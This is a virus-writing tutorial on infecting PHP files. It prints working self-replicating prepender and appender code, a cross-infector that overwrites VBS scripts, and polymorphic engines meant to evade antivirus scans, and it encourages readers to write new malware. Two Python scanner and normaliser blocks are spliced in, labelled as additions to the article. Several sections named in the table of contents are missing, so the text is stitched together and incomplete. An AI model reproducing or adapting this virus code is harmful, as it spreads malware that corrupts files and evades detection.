******
0) Intro Words
1) File infection
a) Prepending
b) Appending
c) Cross Infection
i) VBS infection
ii) JS infection
iii) CMD infection
d) Entry Point Obscuring
i) Include the virus after a command
ii) Using a function of the victim
2) Encryption
a) Changing virus to ASCII
b) Using an internal decryption function
c) Using a changed character string
3) Polymorphism
a) Adding Trash
b) Change Variable Names
c) Number Changing
4) Other Thoughts
a) Find more files
b) Changing the commands
5) Last Words
0) Intro Words
PHP, short for 'Hypertext Preprocessor', is a very common script language
for the world-wide-web. You can do nearly everything internet related with
that language. That means you're also able to make viruses for it. The first
virus for PHP, PHP.Pirus by MaskBits/VXI, was done in October 2000 and was
released in 29A#5. It was no real virus, rather a companion. It writes to
every PHP file in the current directory a line which lets the victim run the
virus. But the host doesn't contain the virus. After searching something
about PHP viruses I found out that there is no high-tech PHP virus out so
far, because all the viruses I could find are rips of PHP.Pirus (using the
same principle). That was my inspiration in writing such an article. I
wanted to make something totally new, and I guess I had success. I tested
every source with PHP 4.3.3, and everything worked fine.
Now go on reading this and learn something about PHP viruses! :)
1) File Infection
That's maybe the most important thing when you want to make a PHP virus,
therefore I want to explain to you how you can infect files with PHP. It
should be no problem to understand the examples, because I tried to make
them as simple as possible. When the article was written (autumn 2003),
there was no real file infector out there. The only interesting PHP virus so
far is MaskBits' PHP.Pirus, which doesn't infect files, but uses the command
'include' so that the virus is executed in every PHP file in the current
dir. You may think 'Why does he tell me this?'. I don't know, just for fun
:). Now let me explain to you how to infect files.
a) Prepending
A prepender copies its code in front of the victim's code, therefore it
will be executed before the victim. That's the main idea of this kind of
infection. But there are some other important things you have to note: To
get the virus out of the file, you need some information about where the
virus is. In my example the virus uses the first 391 bytes. The next
important thing is that you must not infect a file two times. What to do
against that? Check if the file is already infected. In the following
example the virus searches in the first 13 bytes (in an infected file it's
this code: '<?php // SPTH') if there's a 'SPTH'. If yes, the file won't be
infected. OK, I think you understood. Now let's look at the PHP Prepender
Virus example:
- - - - - - - - - - - - - [ PHP Prepender Virus Example ] - - - - - - - - - - - - -
<?php // SPTH
$string=fread(fopen(__FILE__,'r'), 391);
$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))
{
$victim=fopen($file, 'r+');
if (!strstr(fread($victim, 13), 'SPTH'))
{
rewind($victim);
fwrite($victim, $string.fread($victim, filesize($file)););
}
fclose($victim);
}
}
closedir($curdir);
?>
- - - - - - - - - - - - - [ PHP Prepender Virus Example ] - - - - - - - - - - - - -
As this is a really easy virus, you should understand it quickly while
looking at it. Now I'm going to give you the most important things the
example does:
--> Reads the first 391 bytes (which is exactly the virus size)
--> Searches for every .PHP file in the current directory
--> If not infected, reads the victim
b) Appending
An appender is a virus which copies itself after the victim file. It's
really easy to make one. You just have to search the last php-part (or
just make an infection-mark at the beginning of the virus). Then you read
till the end, and you have your virus-file. The rest should be clear: Search
a victim, check if not infected and copy the virus-body to the end of the
file. I made an example for that, as you might think. The exact explanation
will be at the end after the code.
- - - - - - - - - - - - - [ PHP Appender Virus Example ] - - - - - - - - - - - - -
<?php // SPTH
$string='<?php // '.strstr(fread(fopen(__FILE__,'r'), filesize(__FILE__)), 'SPTH');
$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))
{
$victim=fopen($file, 'r+');
if (!strstr(fread($victim, filesize($file)), 'SPTH'))
{
fwrite($victim, $string);
}
fclose($victim);
}
}
closedir($curdir);
?>
- - - - - - - - - - - - - [ PHP Appender Virus Example ] - - - - - - - - - - - - -
I've already explained how the principle works. Now I'll explain to you my
example:
--> Opens the infected file and saves the virus body (searching for 'SPTH',
and saving the rest of the file)
--> Searches for every php-file in the current directory.
--> Checks if not infected (searches for the infection mark 'SPTH' anywhere
in the file. If not found: Not infected)
--> Copies the virus body to the file
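A defender-side check for the two infection layouts just described, added here as an example that is not part of the article: it classifies a file as clean, prepended or appended using only the '<?php // SPTH' mark the article describes, and strips the infection block back out. The host and the placeholder block are constructed sample data; scan_dir is an assumed helper name.

```python
# Added example (not the article's code): a scanner/cleaner for the prepender
# and appender layouts above. It uses only what the article states: the mark
# '<?php // SPTH' sits at offset 0 for a prepended file and later in the file
# for an appended one, and an appended virus body runs to the end of the file.
import os

MARK = b"<?php // SPTH"

# Constructed sample data (placeholder block, not the article's virus code).
HOST = b"<?php\r\necho 'hello';\r\n?>\r\n"
BLOCK = b"<?php // SPTH\r\n/* constructed placeholder body */\r\n?>\r\n"

def classify(data: bytes) -> str:
    """Return 'clean', 'prepended' or 'appended' for one file's bytes."""
    pos = data.find(MARK)
    if pos < 0:
        return "clean"
    return "prepended" if pos == 0 else "appended"

def disinfect(data: bytes) -> bytes:
    """Strip the infection block and return the original host code."""
    kind = classify(data)
    if kind == "prepended":
        # The virus is the first '<?php ... ?>' unit; the host follows its
        # closing tag and the line break the prepended block ends with.
        end = data.find(b"?>", len(MARK))
        if end < 0:
            raise ValueError("mark present but no closing tag: unknown layout")
        rest = data[end + 2:]
        for nl in (b"\r\n", b"\n"):
            if rest.startswith(nl):
                return rest[len(nl):]
        return rest
    if kind == "appended":
        # Everything from the mark to EOF is the appended virus body.
        return data[:data.find(MARK)]
    return data

def scan_dir(path: str) -> dict:
    """Map each .php file under path to its classification (assumed helper)."""
    report = {}
    for root, _, files in os.walk(path):
        for name in files:
            if name.lower().endswith(".php"):
                full = os.path.join(root, name)
                with open(full, "rb") as fh:
                    report[full] = classify(fh.read())
    return report
```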
c) Cross Infection
Cross infection means infecting more than one file extension. That's really
useful, because the virus will spread much faster. That was my inspiration
in writing this. I found some nice ways how to infect other file-formats,
therefore I want to show them to you. The biggest problem while coding these
things was that you can't execute a .php file directly, but only with an
Internet Browser. Fortunately Microsoft makes it possible to open the
Internet Explorer very easily. :)
i) VBS infection
It's really easy to infect a vbs-file, because the only important thing
if you want to write such a cross infector is that you must not use the
sign [" = chr(34) ], because VisualBasicScript uses it for strings, and
since our whole code is a string in the VBS-file, there would be an error.
Now look at the example and try to understand (shouldn't be too difficult,
because I made it very easy to read).
- - - - - - - - - - - - - [ Cross Infector - VBS ] - - - - - - - - - - - - -
<?php
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$vbscode='set fso=WScript.CreateObject('.chr(34).'Scripting.FileSystemObject'.chr(34).')'.chr(13).chr(10);
$vbscode.='set shell=WScript.CreateObject('.chr(34).'WScript.Shell'.chr(34).')'.chr(13).chr(10);
$vbscode.='set virus=fso.CreateTextFile('.chr(34).'index.htm'.chr(34).')'.chr(13).chr(10);
while ($string && $string!='?>')
{
$vbscode.='virus.WriteLine('.chr(34).$string.chr(34).')'.chr(13).chr(10);
$string=strtok(chr(13).chr(10));
}
$vbscode.='virus.WriteLine('.chr(34).'?';
$vbscode.='>'.chr(34).')'.chr(13).chr(10);
$vbscode.='virus.Close()'.chr(13).chr(10);
$vbscode.='shell.Run '.chr(34).'index.htm'.chr(34);
$directory=opendir('.');
while ($file = readdir($directory))
{
if (strstr($file, '.vbs'))
{
fwrite(fopen($file, 'w'), $vbscode);
}
}
closedir($directory);
?>
- - - - - - - - - - - - - [ Cross Infector - VBS ] - - - - - - - - - - - - -
It should be totally easy to understand this example. Anyway, I'll give
you the main ideas of the little code:
--> Splits the php-code (=virus) into lines [chr(13).chr(10)]
--> Makes a vbs code which generates a new HTM-file containing the virus
--> Adds every line to the VBS (as string, so it will be written to the
HTM-file, which will be generated by the VBS [?!?! :D])
--> After finishing the VBS-code, it searches for every .VBS in the current
directory and overwrites it with the code which we made before.
ii) JS infection
Infecting a JavaScript file is nearly the same as infecting a VBS file,
therefore I won't give you an example. The reason for this is that we're
using WScript in VBS and JS. The only thing you have to do is to change the
'set' to 'var', and the '.vbs' to '.js', but I guess you know that :D. I
tried it, and it worked fine.
2) Encryption
The first part of the article should give you the idea how to write a
successful virus in PHP. But more or less, these techniques are easy to
detect for Anti-Virus companies. Therefore I also want to show you how to
fake them. This part (and of course the next part: Polymorphism) of the
article should help you to write a PHP virus which can not be detected by a
simple string scan, or at least to decrease scanstrings. I found many
different ways to crypt a PHP string, and of course I want to tell them to
you :)
3) Polymorphism
As everybody knows, this is one of the most important techniques to fake
AVs and to show that you know what you're doing :). So I decided also to
write something about this technique here. In fact, I've never seen any
other poly PHP virus around the world (maybe it exists anyway). It was
really easy for me to write some poly-engines, because PHP isn't a really
difficult language. I tried my best to show you how a PHP poly engine could
work.
a) Adding Trash
This technique is well-known in many script languages. Therefore I thought
it should also be possible in PHP. Then I sat down and began to write. About
2h later (with smoking-breaks, sure :D), I had the finished code. First I
want to tell you what kind of trash/junk/garbage I included in my example:
- // shsdfjksfdjfds
- $kasjkh=192847832;
- $lwekjcmws='iwsdkjhfskjbnla';
Well, now we know what to include. Anything else to do? Sure, we have to
delete the trash again, otherwise the file would have 2MB after the 10th
time you run it, and I think you don't want that. :) So, how to delete
trash? In my example I searched the first letter of a line and checked if
it's a '/' or a '$'. If yes, it's trash and we don't have to include it in
our new code. It seems I explained everything. Now let's have a look at the
code:
- - - - - - - - - - - - - - - [ Adding Trash example ] - - - - - - - - - - - - - - -
<?php
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$newcont='<?php'.chr(13).chr(10);
srand((double)microtime()*1000000);
while ($string && $string!='?>') {
if(rand(0,1)) {
if (rand(0,1)) { $newcont.='// '.trash('').chr(13).chr(10); }
if (rand(0,1)) { $newcont.='$'.trash('').'='.chr(39).trash('').chr(39).';'.chr(13).chr(10); }
if (rand(0,1)) { $newcont.='$'.trash('').'='.rand().';'.chr(13).chr(10); }
}
$string=strtok(chr(13).chr(10));
if ($string{0}!='/' && $string{0}!='$') { $newcont.=$string.chr(13).chr(10); }
fwrite(fopen(__FILE__, 'w'),$newcont);
}
function trash($var) {
do { $var.=chr(rand(97,122)); } while (rand(0,7));
return $var;
}
?>
- - - - - - - - - - - - - - - [ Adding Trash example ] - - - - - - - - - - - - - - -
Everything should be clear now, anyway, I'll tell you the most important
things in this code-snip:
--> It splits the whole file content of the virus ('__FILE__', as it's
called in PHP) into lines (chr(13).chr(10)).
--> One in two, if the last line wasn't trash, it adds a trash line.
--> If the last line was no trash line, it adds the line to the new content
--> It writes the new content to the file
b) Variable Changing
This is another well-known script technique to morph the virus. So I did
it again in PHP. Let's explain the technique. You're using many variables
in a virus, and if the variables have the same name every generation, our
friends the AV-guys are able to use this fact to detect the virus. So it
could be of much value to change the variable names. How I did it? I used
an array with all the variables which I'm using. Then I searched for every
value from the array in the virus-file (=I searched for every variable),
and replaced it via the command 'str_replace' with a new one, which I got
from my 'trash-function'. Now let's look at the source of the example:
- - - - - - - - - - - - - - - [ Variable changing example ] - - - - - - - - - - - - - - -
<?php
$changevars=array('changevars', 'content', 'newvars', 'counti','countj', 'trash');
srand((double)microtime()*1000000);
$content=fread(fopen(__FILE__,'r'),filesize(__FILE__));
$counti=0;
while($changevars[$counti]) {
$content=str_replace($changevars[++$counti], trash('',0), $content);
}
fwrite(fopen(__FILE__,'w'),$content);
function trash($newvar, $countj) {
do { $newvar.=chr(rand(97,122)); } while (++$countj<rand(5,15));
return $newvar;
}
?>
- - - - - - - - - - - - - - - [ Variable changing example ] - - - - - - - - - - - - - - -
Easy code, easy to understand. Anyway, let me tell you how exactly it
works:
--> Makes a new array with all variables and function-names
--> Gets the whole content of the virus-file
--> Replaces every element of the array in the content with a new one.
--> Writes the content back to the file
c) Number Changing
Every code contains some numbers, whatever this number does. After thinking
a little bit I found out that I can change the numbers too. So I decided to
make a PHP code which changes the numbers in its code. How can we change a
number, you may think. It's really easy: You make a calculation with that
number, which returns the number you want.
Let's have a look at the possible variants:
--> 10=(12-2)
--> 10=(8+2)
--> 10=(80/8)
I also tried to use div, but there are comma-numbers, which don't really
work. But it's no problem, there are enough variants with just 3
calculation types. Now I'll show you how a number could be after the 4th
morphing:
--> 10=((((1289-9)/(6+2))/((15+5)-(4+6)))-(((252/6)/(7-1))-((4+3)-(30/5))))
Now I hope that you know about the damn cool results of this technique :)
After explaining the main thing, I'll show you the little code which
changes the numbers.
- - - - - - - - - - - - - - - [ Number Changing example ] - - - - - - - - - - - - - - -
<?php
$newcont=fread(fopen(__FILE__,'r'),filesize(__FILE__));
srand((double)microtime()*1000000);
$count=-1; $number='';
while(++$count<strlen($newcont)) {
if (ord($newcont{$count})>47 && ord($newcont{$count})<58) {
$number=$newcont{$count};
while(ord($newcont{++$count})>47 && ord($newcont{$count})<58) { $number.=$newcont{$count}; }
$remn=rand(1,10);
switch(rand(1,3)) {
case 1:
$cont.='('.($number-$remn).'+'.$remn.')'; break;
case 2:
$cont.='('.($number+$remn).'-'.$remn.')'; break;
case 3:
$cont.='('.($number*$remn).'/'.$remn.')'; break;
}
}
$cont.=$newcont{$count};
$number='';
}
fwrite(fopen(__FILE__,'w'),$cont);
?>
- - - - - - - - - - - - - - - [ Number Changing example ] - - - - - - - - - - - - - - -
Now a short explanation about the code:
--> Reads everything from the file
--> Searches for a number in every sign [sign>chr(47) && sign<chr(58)]
--> Reads the rest of the number
--> Makes a new calculation with that number
--> Writes the new content to the file
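A defender-side normaliser that undoes the three morphing tricks of this section (junk lines, renamed variables and numbers rewritten as arithmetic), added here as an example that is not part of the article: once two generations normalise to the same text, an ordinary string or hash scan works again. The two sample generations are constructed; the folded expression is the article's own 4th-morphing example, and the function names are assumptions.

```python
# Added example (not the article's code): normalise a morphed PHP file so that
# junk lines, renamed variables and numbers rewritten as arithmetic no longer
# change its text. Two constructed "generations" are included as sample input.
import re
from collections import Counter

GEN1 = "<?php\n$limit=10;\n// shsdfjksfdjfds\n$kasjkh=192847832;\nwhile($i<$limit) { $i=$i+1; }\n?>\n"
GEN2 = ("<?php\r\n$qwe=(12-2);\r\n$lwekjcmws='iwsdkjhfskjbnla';\r\n"
        "while($i<$qwe) { $i=$i+(3-2); }\r\n?>\r\n")
MORPHED = "((((1289-9)/(6+2))/((15+5)-(4+6)))-(((252/6)/(7-1))-((4+3)-(30/5))))"
_BINOP = re.compile(r"\((-?\d+)([-+*/])(-?\d+)\)")

def fold_constants(code: str) -> str:
    """Collapse innermost '(a op b)' integer pairs until nothing folds."""
    def one(m):
        a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
        if op == "+": return str(a + b)
        if op == "-": return str(a - b)
        if op == "*": return str(a * b)
        # the engine above only emits exact divisions; leave anything else alone
        return str(a // b) if b and a % b == 0 else m.group(0)
    prev = None
    while prev != code:
        prev, code = code, _BINOP.sub(one, code)
    return code

def drop_junk(code: str) -> str:
    """Drop '//' comment lines and literal assignments to never-used variables."""
    uses = Counter(re.findall(r"\$\w+", code))
    kept = []
    for line in code.split("\n"):
        lit = re.fullmatch(r"\s*(\$\w+)\s*=\s*(?:'[^']*'|-?\d+)\s*;\s*", line)
        if re.match(r"\s*//", line) or (lit and uses[lit.group(1)] == 1):
            continue
        kept.append(line)
    return "\n".join(kept)

def canonical_names(code: str) -> str:
    """Rename variables and user functions by order of first appearance."""
    seen = {}
    def var(m):
        return "$" + seen.setdefault(m.group(1), "v%d" % (len(seen) + 1))
    code = re.sub(r"\$([A-Za-z_]\w*)", var, code)
    for k, fn in enumerate(re.findall(r"\bfunction\s+([A-Za-z_]\w*)", code)):
        code = re.sub(r"\b%s\b" % re.escape(fn), "f%d" % (k + 1), code)
    return code

def normalize(code: str) -> str:
    # fold numbers first so junk assignments like '$x=(12-2);' become literals
    code = canonical_names(drop_junk(fold_constants(code.replace("\r\n", "\n"))))
    return "\n".join(l for l in code.split("\n") if l.strip())
```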
4) Other Thoughts
When I wrote this article, some other ideas came to my mind, therefore I
also want to give the ideas to you. Maybe some of the ideas are just
nonsense or others are brilliant (I don't think so, but wonders happen :D ).
OK, let's start: This part contains ideas for better hiding to not become
detected, or how to spread faster. I hope you also like to read this!
5) Last Words
Coming to an end I want to say that I had really much fun while discovering
this language, and I also hope that you learned some things. I hope that I
will see many new and good PHP malware in the near future. If I don't see
any, I know that I worked 2-3 months for nothing. :) But let's see it
positively: Now it's easy to write strong viruses for this language, because
the techniques are already discovered. Here at this point I want to thank
MaskBits/VXI for making the first PHP malware called PHP.Pirus, which was
released in 29a#5. This inspired me in writing this article, because I found
out that the current PHP viruses are not at the point where you can say:
"It's perfect, we can't make it better." :). Another guy I want to thank is
SnakeByte, because of his articles about Perl poly/EPO/encryption in 29a#6.
It helped me in some parts of this article. Greets go also to Kefi, who also
wrote a PHP-polymorphic virus, which I haven't seen so far. The fact that I
know that made me very active in writing this article :). Now I want to send
some greets and thanks out to the world, because I think that I said
everything that is important:
PhileT0aster and the rest of the rRlf-gang ;), jackie for being something
like an idol for me, SlageHammer & Knowdeth - the most friendly VX guys I
know :), VirusBuster - for answering my stupid questions every time, Vorgon
- for trying to teach me assembler :D, Toro - for helping me with many
problems, SnakeByte for the great tutorials you wrote, SAD1c - for being a
great guy, VorteX & Worf for being the first guys who helped in the VX-world
:), VxF & Metal for the great fun in IRC :), Doctor Rave for some great
ideas you gave me, prizzy for the nice email you wrote, herm1t for hosting
my homepage, sinocred for hating the '<SPTH> hi' :D, PanoiX for being a cool
guy :), Arzy for being very helpful :D, Necronomikon & Gigabyte for cool
talks in IRC (unfortunately we have nearly no contact recently) and many
other cool individuals I know... :)
I also want to send out some group greets: Greets to rRlf (of course :D),
29A, iKx, SLAM, TKT, MIONS, Whackerz and every other more or less active
virus-writing-group!